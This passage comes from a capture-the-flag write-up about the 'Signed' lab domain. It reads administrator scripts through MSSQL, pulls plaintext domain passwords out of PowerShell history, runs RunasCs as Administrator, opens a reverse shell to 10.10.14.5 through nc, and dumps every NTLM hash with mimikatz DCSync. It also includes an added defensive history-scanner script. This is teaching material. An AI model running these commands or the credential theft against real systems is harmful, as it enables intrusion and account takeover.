$($record.HostName) [$($record.RecordType)]"\r\n            }\r\n        }\r\n    } catch {\r\n        Write-Warning "Failed to remove $($record.HostName) [$($record.RecordType)]: $_"\r\n    }\r\n}\r\n\r\nWrite-Host "DNS cleanup completed."'   

SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'c:\Users\Administrator\Documents\restart.ps1', SINGLE_CLOB) AS c;
BulkColumn                                                                                       
----------------------------------------------------------------------------------------------   
b'while ($true) {\r\n    Restart-Service -Name DNS -Force\r\n    Start-Sleep -Seconds 10\r\n}'   

SQL (SIGNED\mssqlsvc  dbo@master)>
#cleanup.ps1
# DNS cleanup
$ZoneName = "signed.htb"

# List of default DNS records to keep (from your provided list)
$defaultRecords = @(
    @{Host="@" ; Type="A"},
    @{Host="@" ; Type="AAAA"},
    @{Host="@" ; Type="NS"},
    @{Host="@" ; Type="SOA"},
    @{Host="_gc._tcp" ; Type="SRV"},
    @{Host="_gc._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_kerberos._tcp" ; Type="SRV"},
    @{Host="_kerberos._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_kerberos._udp" ; Type="SRV"},
    @{Host="_kpasswd._tcp" ; Type="SRV"},
    @{Host="_kpasswd._udp" ; Type="SRV"},
    @{Host="_ldap._tcp" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_msdcs" ; Type="NS"},
    @{Host="dc01" ; Type="A"},
    @{Host="dc01" ; Type="AAAA"},
    @{Host="DomainDnsZones" ; Type="A"},
    @{Host="DomainDnsZones" ; Type="AAAA"},
    @{Host="_ldap._tcp.DomainDnsZones" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones" ; Type="SRV"},
    @{Host="ForestDnsZones" ; Type="A"},
    @{Host="ForestDnsZones" ; Type="AAAA"},
    @{Host="_ldap._tcp.ForestDnsZones" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones" ; Type="SRV"}
)

# Get all records in zone
$allRecords = Get-DnsServerResourceRecord -ZoneName $ZoneName

foreach ($record in $allRecords) {

    # Check if record is in defaults
    $keep = $defaultRecords | Where-Object {
        $_.Host -eq $record.HostName -and $_.Type -eq $record.RecordType
    }

    if ($keep) { continue } # Skip default records

    try {
        switch ($record.RecordType) {
            "A" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "A" -Name $record.HostName -RecordData $record.RecordData.IPv4Address -Force
                Write-Host "Removed A record: $($record.HostName)"
            }
            "AAAA" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "AAAA" -Name $record.HostName -RecordData $record.RecordData.IPv6Address -Force
                Write-Host "Removed AAAA record: $($record.HostName)"
            }
            "CNAME" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "CNAME" -Name $record.HostName -RecordData $record.RecordData.HostNameAlias -Force
                Write-Host "Removed CNAME record: $($record.HostName)"
            }
            "MX" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "MX" -Name $record.HostName -RecordData $record.RecordData.MailExchange -Force
                Write-Host "Removed MX record: $($record.HostName)"
            }
            "TXT" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "TXT" -Name $record.HostName -RecordData $record.RecordData.DescriptiveText -Force
                Write-Host "Removed TXT record: $($record.HostName)"
            }
            "SRV" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "SRV" -Name $record.HostName -RecordData $record.RecordData -Force
                Write-Host "Removed SRV record: $($record.HostName)"
            }
            default {
                Write-Host "Skipping unsupported record type: $($record.HostName) [$($record.RecordType)]"
            }
        }
    }
    catch {
        Write-Warning "Failed to remove $($record.HostName) [$($record.RecordType)]: $_"
    }
}

Write-Host "DNS cleanup completed."
# restart.ps1
while ($true) {
    Restart-Service -Name DNS -Force
    Start-Sleep -Seconds 10
}

History File

We also find this user's PowerShell command history.

# Silver Ticket + EXECUTE AS "shell"
SQL (SIGNED\Administrator  guest@master)> xp_dirtree C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine
[%] exec master.sys.xp_dirtree 'C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine',1,1
subdirectory              depth   file   
-----------------------   -----   ----   
ConsoleHost_history.txt       1      1   

SQL (SIGNED\Administrator  guest@master)>

# Silver Ticket "shell"
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine/ConsoleHost_history.txt', SINGLE_CLOB) AS c;
BulkColumn                                                                                                                                                                                                                                                        
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
b'# Domain`\n$Domain = "signed.htb"`\n`\n# Groups`\n$Groups = @("HR","IT","Finance","Developers","Support")`\n`\nforeach ($grp in $Groups) {`\n    if (-not (Get-ADGroup -Filter "Name -eq \'$grp\'" -ErrorAction SilentlyContinue)) {`\n        [... cut ...] updates.exe\r\niwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe\r\n.\\updates.exe.exe\r\n.\\updates.exe\r\nmove .\\updates.exe .\\updates.msu\r\n.\\updates.msu\r\ndel .\\updates.msu\r\n'   

SQL (SIGNED\mssqlsvc  dbo@master)>

Inside the history we find the credentials of every user in the domain, including the administrator's.

# [... cut ...]

# Users: Username, Password, Group
$Users = @(
    @{Username="oliver.mills";       Password="!Abc987321$"; Group="HR"},
    @{Username="emma.clark";         Password="!Xyz654789#"; Group="HR"},
    @{Username="liam.wright";        Password="!Qwe123789&"; Group="HR"},

    @{Username="noah.adams";         Password="!ItDev456$"; Group="IT"},
    @{Username="ava.morris";         Password="!ItDev789#"; Group="IT"},

    @{Username="sophia.turner";      Password="!Fin987654$"; Group="Finance"},
    @{Username="james.morgan";       Password="!Fin123987#"; Group="Finance"},
    @{Username="mia.cooper";         Password="!Fin456321&"; Group="Finance"},

    @{Username="elijah.brooks";      Password="!Dev123456$"; Group="Developers"},
    @{Username="isabella.evans";     Password="!Dev789654#"; Group="Developers"},
    @{Username="lucas.murphy";       Password="!Dev321987&"; Group="Developers"},
    @{Username="william.johnson";    Password="!ItDev321&"; Group="Developers"},

    @{Username="charlotte.price";    Password="!Sup123456$"; Group="Support"},
    @{Username="henry.bennett";      Password="!Sup654321#"; Group="Support"},
    @{Username="amelia.kelly";       Password="!Sup987123&"; Group="Support"},
    @{Username="jackson.gray";       Password="!Sup321654$"; Group="Support"},
    @{Username="harper.diaz";        Password="!Sup789321#"; Group="Support"}
)

# [... cut ...]

Get-NetConnectionProfile
Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset
Set-Service TermService -StartupType disabled
exit
# [... cut ...]
# Domain
$Domain = "signed.htb"

# Groups
$Groups = @("HR", "IT", "Finance", "Developers", "Support")

foreach ($grp in $Groups) {
    if (-not (Get-ADGroup -Filter "Name -eq '$grp'" -ErrorAction SilentlyContinue)) {
        New-ADGroup -Name $grp -GroupScope Global -GroupCategory Security
    }
}

# Users: Username, Password, Group
$Users = @(
    @{ Username="oliver.mills";    Password="!Abc987321$"; Group="HR" },
    @{ Username="emma.clark";      Password="!Xyz654789#"; Group="HR" },
    @{ Username="liam.wright";     Password="!Qwe123789&"; Group="HR" },

    @{ Username="noah.adams";      Password="!ItDev456$"; Group="IT" },
    @{ Username="ava.morris";      Password="!ItDev789#"; Group="IT" },

    @{ Username="sophia.turner";   Password="!Fin987654$"; Group="Finance" },
    @{ Username="james.morgan";    Password="!Fin123987#"; Group="Finance" },
    @{ Username="mia.cooper";      Password="!Fin456321&"; Group="Finance" },

    @{ Username="elijah.brooks";   Password="!Dev123456$"; Group="Developers" },
    @{ Username="isabella.evans";  Password="!Dev789654#"; Group="Developers" },
    @{ Username="lucas.murphy";    Password="!Dev321987&"; Group="Developers" },
    @{ Username="william.johnson"; Password="!ItDev321&"; Group="Developers" },

    @{ Username="charlotte.price"; Password="!Sup123456$"; Group="Support" },
    @{ Username="henry.bennett";   Password="!Sup654321#"; Group="Support" },
    @{ Username="amelia.kelly";    Password="!Sup987123&"; Group="Support" },
    @{ Username="jackson.gray";    Password="!Sup321654$"; Group="Support" },
    @{ Username="harper.diaz";     Password="!Sup789321#"; Group="Support" }
)

foreach ($u in $Users) {
    if (-not (Get-ADUser -Filter "SamAccountName -eq '$($u.Username)'" -ErrorAction SilentlyContinue)) {
        New-ADUser `
            -Name $u.Username `
            -SamAccountName $u.Username `
            -UserPrincipalName "$($u.Username)@$Domain" `
            -AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force) `
            -Enabled $true `
            -PasswordNeverExpires $true

        Add-ADGroupMember -Identity $u.Group -Members $u.Username
    }
}

Invoke-WebRequest `
    -Uri "https://go.microsoft.com/fwlink/?linkid=2215202&clcid=0x409&culture=en-us&country=us" `
    -OutFile "C:\Windows\Tasks\SQL2022-SSEI-Expr.exe"

C:\Windows\Tasks\SQL2022-SSEI-Expr.exe

cd \
dir
cd .\SQL2022\
dir
cd .\Evaluation_ENU\
dir
.\SETUP.EXE /ACTION=Install

Get-Service -Name MSSQLSERVER
New-NetFirewallRule -DisplayName "SQL Server TCP 1433" -Direction Inbound -Protocol TCP -LocalPort 1433 -Action Allow -Profile Any
Set-Service MSSQLSERVER -StartupType Automatic
Start-Service MSSQLSERVER
Get-Service -Name MSSQLSERVER

whoami /all

secedit /export /cfg C:\Windows\Tasks\cur.inf
notepad C:\Windows\Tasks\cur.inf
secedit /configure /db C:\Windows\Security\local.sdb /cfg C:\Windows\Tasks\cur.inf /areas USER_RIGHTS

sc.exe privs MSSQLSERVER SeChangeNotifyPrivilege/SeCreateGlobalPrivilege/SeIncreaseWorkingSetPrivilege/SeIncreaseQuotaPrivilege
Restart-Service MSSQLSERVER

$zone = "DC=signed.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=signed,DC=htb"
$account = Get-ADUser mssqlsvc
$acl = Get-Acl "AD:$zone"
$identity = New-Object System.Security.Principal.NTAccount($account.SamAccountName)
$rights = [System.DirectoryServices.ActiveDirectoryRights]"GenericAll"
$inheritance = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($identity, $rights, "Allow", $inheritance)
$acl.AddAccessRule($ace)
Set-Acl -AclObject $acl "AD:$zone"

Enable-PSRemoting -Force

$FQDN = "dc01.signed.htb"
$cert = New-SelfSignedCertificate `
    -DnsName $FQDN `
    -CertStoreLocation Cert:\LocalMachine\My `
    -KeyExportPolicy Exportable `
    -FriendlyName "WinRM HTTPS $FQDN" `
    -NotAfter (Get-Date).AddYears(5)

$thumb = $cert.Thumbprint.Replace(" ", "")
winrm create winrm/config/Listener?Address=*+Transport=HTTPS `
    "@{Hostname=`"$FQDN`";CertificateThumbprint=`"$thumb`"}"

try { winrm delete winrm/config/Listener?Address=*+Transport=HTTP } catch {}

Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
netsh advfirewall firewall add rule name="WinRM over HTTPS (5986)" dir=in action=allow protocol=TCP localport=5986
Restart-Service WinRM -Force

netstat -ano -p tcp
winrm enumerate winrm/config/listener
winrm get winrm/config
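
PSReadLine appends every interactive command to ConsoleHost_history.txt, which is why the provisioning script and the password reset above were recoverable through the MSSQL file read. As an added example that is not part of the original post, the Python scanner below flags and redacts credential-bearing lines in such a history; the sample history and the rule names are constructed for the demonstration (the usernames come from the writeup, the passwords are placeholders).

```python
r"""Flag credential-bearing lines in a PSReadLine ConsoleHost_history.txt.

Added example for this writeup, not code from the original post or the box.
PSReadLine keeps every interactive PowerShell line on disk, so provisioning
scripts and password resets typed at the console leak exactly as seen here.
"""
import re
from dataclasses import dataclass

# (rule name, regex) pairs; the named group "secret" is the value to redact.
RULES = [
    # @{Username="x"; Password="..."} hashtables from bulk-provisioning scripts
    ("hashtable-password",
     re.compile(r'Password\s*=\s*["\'](?P<secret>[^"\']+)["\']', re.I)),
    # ConvertTo-SecureString "..." -AsPlainText as used in password resets
    ("securestring-plaintext",
     re.compile(r'ConvertTo-SecureString\s+(?:-String\s+)?["\'](?P<secret>[^"\']+)["\'].*?-AsPlainText', re.I)),
    # RunasCs <user> <password> ...: the password is the second positional argument
    ("runascs-args",
     re.compile(r'RunasCs(?:\.exe)?\s+\S+\s+(?P<secret>\S+)', re.I)),
    # net user <name> <password> ...; "/domain"-style switches are not secrets
    ("net-user-password",
     re.compile(r'net\s+user\s+\S+\s+(?P<secret>(?!/)\S+)', re.I)),
]

@dataclass
class Finding:
    line_no: int
    rule: str
    redacted: str  # offending line with the secret replaced by ***

def scan_history(text: str) -> list[Finding]:
    """Return one Finding per history line that matches a credential rule."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            match = pattern.search(line)
            if match:
                start, end = match.span("secret")
                findings.append(Finding(line_no, rule, line[:start] + "***" + line[end:]))
                break  # one finding per line is enough for triage
    return findings

# Constructed sample history modelled on the lines seen on this box; the
# usernames are taken from the writeup, the passwords are placeholders.
SAMPLE_HISTORY = r"""# Users: Username, Password, Group
$Users = @(
    @{Username="oliver.mills"; Password="Hr-Sample-1"; Group="HR"},
    @{Username="noah.adams";   Password="It-Sample-2"; Group="IT"}
)
Get-NetConnectionProfile
Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Adm1n-Sample!" -AsPlainText -Force) -Reset
.\RunasCs.exe Administrator Adm1n-Sample! "cmd /c whoami"
net user svc_backup /domain
exit
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no:>3} [{f.rule}] {f.redacted.strip()}")
```

Pointing `scan_history` at the real file (`%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`) is the check to run on any host where administrators work interactively; the redacted output is safe to forward to a ticket.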

System Shell via RunasCs

We use the mssqlsvc shell to run RunasCs with the administrator credentials, which lets us execute commands as that user.

PS C:\users\mssqlsvc\Documents> ./RunasCs.exe Administrator Th1s889Rabb!t "cmd /c whoami"

signed\administrator
PS C:\users\mssqlsvc\Documents>

We launch a reverse shell.

PS C:\users\mssqlsvc\Documents> ./RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r 10.10.14.5:1337

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-55f77$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5988 created in background.
PS C:\users\mssqlsvc\Documents>

Finally, we obtain access as administrator.

❯ rlwrap nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from signed.htb [10.10.11.90] 54470
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
signed\administrator
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
PS C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt
6e953c5b088e620c60433810bed4dbad
PS C:\Windows\system32>

Dump Hashes

We run mimikatz to obtain the domain users' hashes, although we already had the plaintext credentials.

mimikatz # lsadump::dcsync /domain:signed.htb /all /csv
[DC] 'signed.htb' will be the domain
[DC] 'DC01.SIGNED.HTB' will be the DC server
[DC] Exporting domain 'signed.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1109	oliver.mills	21d4dcaeb62cb577227094aa72dab5f3	66048
1110	emma.clark	0ba359ab587d350c644de9c3145d8668	66048
1111	liam.wright	6e46f64af0398d58eaa71c87fd54f6b2	66048
1112	noah.adams	d48af06d555bbae68c58efe47bcd2c0d	66048
1113	ava.morris	2c8313bbe020fb9e208fb6f933c3623f	66048
1114	sophia.turner	71a04f69295d7c7a4f36b864d0a01cad	66048
1115	james.morgan	0813fe8852c857e961ca1d65b20a95f9	66048
1116	mia.cooper	9cc5251ebf86225e53a9bcac8adf1842	66048
1117	elijah.brooks	89b1e2dc085e7a9e35d64aced32835e8	66048
1118	isabella.evans	c4874b2cc244102dbede7997fdfcc443	66048
1119	lucas.murphy	9e488a69fba0e675bde844c2359176c9	66048
1120	william.johnson	b5cdbf491a0a3fd27f7d78e57ecd3a01	66048
1121	charlotte.price	7b2351de0ebd879b285a391cd22da871	66048
1122	henry.bennett	f368d7adbfcdd0690f91304ea0d81b6d	66048
1123	amelia.kelly	3f817cb56c6985322d68e753d4931fde	66048
1124	jackson.gray	e55da171150de5fdbf3a69cda4c29944	66048
1125	harper.diaz	7cd44096ab804dcbf4da88b0becd86d8	66048
1103	mssqlsvc	ef699384c3285c54128a3ee1ddb1a0cc	66048
502	krbtgt	e66dab342f64c9a323012d62cd786de1	514
1000	DC01$	91d90e085c72770d23228f1b5dabaa23	532480
500	Administrator	62a34972744e3c2e078677e0c177c823	66048

mimikatz #

Dany Sucuc
WRITTEN BY
sckull